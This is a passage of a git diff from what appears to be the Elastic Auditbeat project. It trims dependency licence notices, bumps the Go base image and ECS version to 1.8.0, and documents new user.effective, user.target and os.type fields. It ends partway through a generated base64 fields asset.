github.com/mattn/go-sqlite3 Version: v1.9.0 @@ -38389,249 +37456,6 @@ Contents of probable licence file $GOMODCACHE/github.com/prometheus/client_golan limitations under the License. --------------------------------------------------------------------------------- -Dependency : github.com/rakyll/statik -Version: v0.1.6 -Licence type (autodetected): Apache-2.0 --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/rakyll/statik@v0.1.6/LICENSE: - - - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - APPENDIX: How to apply the Apache License to your work. - - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "[]" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - - Copyright 2014 Google Inc. - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - - --------------------------------------------------------------------------------- -Dependency : github.com/reviewdog/errorformat -Version: v0.0.0-20200109134752-8983be9bc7dd -Licence type (autodetected): MIT --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/reviewdog/errorformat@v0.0.0-20200109134752-8983be9bc7dd/LICENSE: - -MIT License - -Copyright (c) 2016 haya14busa - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - - -------------------------------------------------------------------------------- Dependency : github.com/rogpeppe/fastuuid Version: v1.2.0 @@ -40332,218 +39156,6 @@ OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. --------------------------------------------------------------------------------- -Dependency : github.com/xanzy/go-gitlab -Version: v0.22.3 -Licence type (autodetected): Apache-2.0 --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/xanzy/go-gitlab@v0.22.3/LICENSE: - -Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - APPENDIX: How to apply the Apache License to your work. - - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "{}" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - - Copyright {yyyy} {name of copyright owner} - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - - - -------------------------------------------------------------------------------- Dependency : github.com/xdg/stringprep Version: v1.0.0 diff --git a/auditbeat/Dockerfile b/auditbeat/Dockerfile index e5767ab11670..98c459dc4f48 100644 --- a/auditbeat/Dockerfile +++ b/auditbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt-get update \ diff --git a/auditbeat/Jenkinsfile.yml b/auditbeat/Jenkinsfile.yml index 168ac26edd50..346145606b50 100644 --- a/auditbeat/Jenkinsfile.yml +++ b/auditbeat/Jenkinsfile.yml @@ -83,3 +83,7 @@ stages: # - "windows-7" # branches: true ## for all the branches # tags: true ## for all the tags + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/auditbeat/_meta/fields.common.yml b/auditbeat/_meta/fields.common.yml index a7633a98b0cc..f6c6e6d7145b 100644 --- a/auditbeat/_meta/fields.common.yml +++ b/auditbeat/_meta/fields.common.yml @@ -66,27 +66,6 @@ type: keyword description: Audit user name. - - name: effective - type: group - description: Effective user information. - fields: - - name: id - type: keyword - description: Effective user ID. - - name: name - type: keyword - description: Effective user name. - - name: group - type: group - description: Effective group information. - fields: - - name: id - type: keyword - description: Effective group ID. - - name: name - type: keyword - description: Effective group name. - - name: filesystem type: group description: Filesystem user information. diff --git a/auditbeat/cmd/root.go b/auditbeat/cmd/root.go index a819fa708f96..0766f05b05c0 100644 --- a/auditbeat/cmd/root.go +++ b/auditbeat/cmd/root.go @@ -35,7 +35,7 @@ const ( Name = "auditbeat" // ecsVersion specifies the version of ECS that Auditbeat is implementing. - ecsVersion = "1.7.0" + ecsVersion = "1.8.0" ) // RootCmd for running auditbeat. diff --git a/auditbeat/docs/fields.asciidoc b/auditbeat/docs/fields.asciidoc index a3411566ed51..cd143ad919e7 100644 --- a/auditbeat/docs/fields.asciidoc +++ b/auditbeat/docs/fields.asciidoc @@ -51,15 +51,6 @@ alias to: user.id -- -*`user.euid`*:: -+ --- -type: alias - -alias to: user.effective.id - --- - *`user.fsuid`*:: + -- @@ -87,15 +78,6 @@ alias to: user.group.id -- -*`user.egid`*:: -+ --- -type: alias - -alias to: user.effective.group.id - --- - *`user.sgid`*:: + -- @@ -139,15 +121,6 @@ alias to: user.name -- -*`user.name_map.euid`*:: -+ --- -type: alias - -alias to: user.effective.name - --- - *`user.name_map.fsuid`*:: + -- @@ -175,15 +148,6 @@ alias to: user.group.name -- -*`user.name_map.egid`*:: -+ --- -type: alias - -alias to: user.effective.group.name - --- - *`user.name_map.sgid`*:: + -- @@ -2722,54 +2686,6 @@ type: keyword -- -[float] -=== effective - -Effective user information. - - -*`user.effective.id`*:: -+ --- -Effective user ID. - -type: keyword - --- - -*`user.effective.name`*:: -+ --- -Effective user name. - -type: keyword - --- - -[float] -=== group - -Effective group information. - - -*`user.effective.group.id`*:: -+ --- -Effective group ID. - -type: keyword - --- - -*`user.effective.group.name`*:: -+ --- -Effective group name. - -type: keyword - --- - [float] === filesystem @@ -4738,7 +4654,7 @@ example: apache + -- Raw text message of entire event. Used to demonstrate log integrity. -This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. type: keyword @@ -4791,7 +4707,7 @@ example: Terminated an unexpected process + -- Reference URL linking to additional information about this event. -This URL links to a static definition of the this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. type: keyword @@ -5982,6 +5898,19 @@ example: darwin -- +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`host.os.version`*:: + -- @@ -7056,6 +6985,19 @@ example: darwin -- +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`observer.os.version`*:: + -- @@ -7226,6 +7168,19 @@ example: darwin -- +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`os.version`*:: + -- @@ -10377,6 +10332,7 @@ URL fields provide support for complete or partial URLs, and supports the breaki -- Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. type: keyword @@ -10552,6 +10508,119 @@ The user fields describe information about the user that is relevant to the even Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.domain`*:: + -- @@ -10562,6 +10631,119 @@ type: keyword -- +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.email`*:: + -- @@ -10665,6 +10847,119 @@ example: ["kibana_admin", "reporting_user"] -- +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + [float] === user_agent @@ -10781,6 +11076,19 @@ example: darwin -- +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`user_agent.os.version`*:: + -- @@ -12040,6 +12348,16 @@ type: keyword The operating system's kernel version. +type: keyword + +-- + +*`system.audit.host.os.type`*:: ++ +-- +OS type (see ECS os.type). + + type: keyword -- diff --git a/auditbeat/include/fields.go b/auditbeat/include/fields.go index 6930e7ef2b86..861d51b9705e 100644 --- a/auditbeat/include/fields.go +++ b/auditbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "eJzs/XtzGzmSKIr/358CP23ET/YsVSL1sqx7J+KoJXW3Yv3QWPL0To83JLAKJDGqAqoBlGj2if3uN5AJoFAPSZQt2m6P5px1i2QVkEgk8oV8/Af59fDdm9M3P///yLEkQhrCMm6ImXFNJjxnJOOKpSZfDAg3ZE41mTLBFDUsI+MFMTNGTo7OSankv1hqBj/8BxlTzTIiBXx/w5TmUpBR8iIZJj/8BznLGdWM3HDNDZkZU+qDzc0pN7NqnKSy2GQ51YanmyzVxEiiq+mUaUPSGRVTBl/ZYSec5ZlOfvhhg1yzxQFhqf6BEMNNzg7sAz8QkjGdKl4aLgV8RX5y7xD39sEPhGwQQQt2QNb/j+EF04YW5foPhBCSsxuWH5BUKgafFfu94oplB8SoCr8yi5IdkIwa/NiYb/2YGrZpxyTzGROAJnbDhCFS8SkXFn3JD/AeIRcW11zDQ1l4j300iqYWzRMli3qEgZ2YpzTPF0SxUjHNhOFiChO5EevpejdMy0qlLMx/OolewN/IjGoipIc2JwE9AySNG5pXDIAOwJSyrHI7jRvWTTbhSht4vwWWYinjNzVUJS9ZzkUN1zuHc9wvMpGK0DzHEXSC+8Q+0qK0m76+NRztbQx3N7a2L4b7B8Pdg+2dZH93+7f1aJtzOma57t1g3E05tlQMX+Cfl/j9NVvMpcp6Nvqo0kYW9oFNxElJudJhDUdUkDEjlT0SRhKaZaRghhIuJlIV1A5iv3drIuczWeUZHMNUCkO5IIJpu3UIDpCv/d9hnuMeaEIVI9pIiyiqPaQBgBOPoKtMptdMXREqMnJ1va+vHDo6mPy/a7Qsc54CdGsHZG0i5caYqrUBWWPixn5TKplVKfz+vzGCC6Y1nbI7MGzYR9ODxp+kIrmcOkQAPbix3O47dOBP9kn384DI0vCC/xHoztLJDWdzeya4IBSetl8wFbBip9NGVampLN5yOdVkzs1MVoZQUZN9A4YBkWbGlGMfJMWtTaVIqWEionwjLRAFoWRWFVRsKEYzOs4Z0VVRULUgMjpx8TEsqtzwMg9r14R95Noe+Rlb1BMWYy5YRrgwkkgRnm5v5C8szyX5Vao8i7bI0OldJyCmdD4VUrFLOpY37ICMhls73Z17xbWx63Hv6UDqhk4Jo+nMr7JJY/+MSQjpamvtf2JSolMmkFIcWz8MX0yVrMoDstVDRxczhm+GXXLHyDFXSujYbjKywYmZ29NjGaixAm7itoKKhcU5tacwz+25G5CMGfxDKiLHmqkbuz1IrtKS2UzanZKKGHrNNCkY1ZVihX3ADRsea59OTbhI8ypj5EdGLR+AtWpS0AWhuZZEVcK+7eZVOgGJBgtN/uKW6obUM8skx6zmx0DZFn7Kc+1pD5GkKiHsOZGIIAtbtD7lhpzPmIq594yWJbMUaBcLJzUsFTi7RYBw1DiR0ghp7J77xR6QU5wutZqAnOCi4dzagzio4UssKRCniYwZNUl0fg/PXoNO4iRnc0Fux2lZbtql8JQlpKaNmPtmknnUAdsFRYPwCVIL18TKV2JmSlbTGfm9YpUdXy+0YYUmOb9m5L/o5JoOyDuWcaSPUsmUac3F1G+Ke1xX6cxy6Vdyqg3VM4LrIOeAbocyPIhA5IjCoK7Up2Nc8TxLPJ9ys7RPdN+ZvvVUt0/SyUfDRGbFs52qgbKJ23fcI0/LTpFBdm01GuEGMDKcQioWPePBSaOIcNQ/wpD2BJRK3vCMDaxCokuW8glPCb4Nig/XQT1zGIw4TcGM4qmlnaCLvkj2kiF5Rotsb+f5gOR8DD/j1//co1vbbH+yP9keTnaHw9GYbu/ssB22u5PtZy/T8f5WOh4NX6QBRLseQ7aGW8ON4dbGcJdsbR+MhgejIfnP4XA4JO8vjv4nYHhCq9xcAo4OyITmmjW2lZUzVjBF80ueNTeVue14hI31cxCeWc434UwhV+DanY9nfAKCBaSPft7eYm41FFWA1ucVc5oqqe1GaEOVZZPjypArpBCeXcExswesu0P7dMcietJARHv5j0PT7wX/3aqtD193UKMs50F+Be/NQV8bMwLcifcQoFte1lie/XcVC3TaKLDNmNF3dlATik+hlEPNYspvGKijVLjX8Gn384zl5aTKLW+0HMCtMAxs5pL85Pg04UIbKlKnnrbEjLYTg6yxROK0